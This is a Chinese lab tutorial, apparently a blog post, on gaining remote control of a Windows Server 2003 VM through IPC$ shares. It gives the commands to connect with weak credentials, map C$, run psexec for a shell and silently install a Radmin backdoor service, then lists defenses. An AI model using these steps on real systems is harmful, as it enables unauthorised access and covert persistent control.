利用IPC漏洞实现远程控制

0x00 漏洞说明

IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。

0x01 工具准备

操作系统:

攻击机器 任意windows系统 本次实验中我所使用的是win10 专业版

目标靶机 windows xp 或者 windows server 2003 可以虚拟机,因为最近在玩webug,就直接使用windows server 2003了

实验工具 链接:http://pan.baidu.com/s/1nuFbekh 密码:lw0n

0x02 实验过程

步骤1

使用net share命令观察目标靶机IPC$漏洞是否存在

1.png

步骤2

首先ping一下目标靶机,观察网络连通性。

然后执行 net use \ip “密码” /user:”登陆账户”命令建立IPC$连接

使用 net use z: \ip\c$ 命令,将目标靶机的C盘映射到本地z盘

2.png

完成上述命令后将会在计算机看到网络位置出现了一个新的盘符,实际上目前就可以通过可视化桌面像在本地操作一样拷贝文件。

3.png

步骤2.5

如果你想酷一点的话,我们来试试copy指令。将要使用的远程控制软件拷贝到目标靶机的C盘中。执行过程如下:


4.png

步骤3

上述命令执行完毕后,我们使用psexec启动目标靶机上的一个shell。

将路径切换到psexec程序所在路径下 ,执行如下命令:

psexec.exe \ip –u 用户名 –p 密码 cmd.exe

5.png

步骤4

接下来我们来安装控制后门并启动运行。

使用如下指令实现r_server的静默安装:r_server /install /silence

执行两次net start r_server来启动后门服务,出现如下所示,即启动成功。

6.png

步骤5

接下来,我们使用radmin来连接目标靶机上运行的r_server

7.png

添加完成后,我们将可以像在本地一样操作目标靶机

8.png

9.png

0x03 防御

1 关闭IPC$默认共享

10.png

2 关闭IPC$默认共享的依赖服务server

控制面板/管理工具/服务 找到server 关闭

3 屏蔽139,445端口

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 103,704评论 13 125
  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 141,625评论 20 608
  • 哈咯我回来啦! 最近每日天天在高数的海洋里驰骋,都忘记了更新噢! 可是就是这么一碗混沌 噢不 馄饨,真真的唤醒了我...
    张多多想回家阅读 85评论 0 0
  • 每个人是不是都有很多故事,是不是每个人的故事写出来,都能写成一本书。 别虚伪,你只是,不愿意等,不愿意等我长大。没...
    伞下小mu阅读 26评论 0 0
  • 6岁不到,你曾抱着储蓄罐和外婆说,“我有很多很多钱,我是很富有的。”8岁,你和外婆讨论如何以做家务换零花钱。10岁...
    微澜细语阅读 538评论 2 14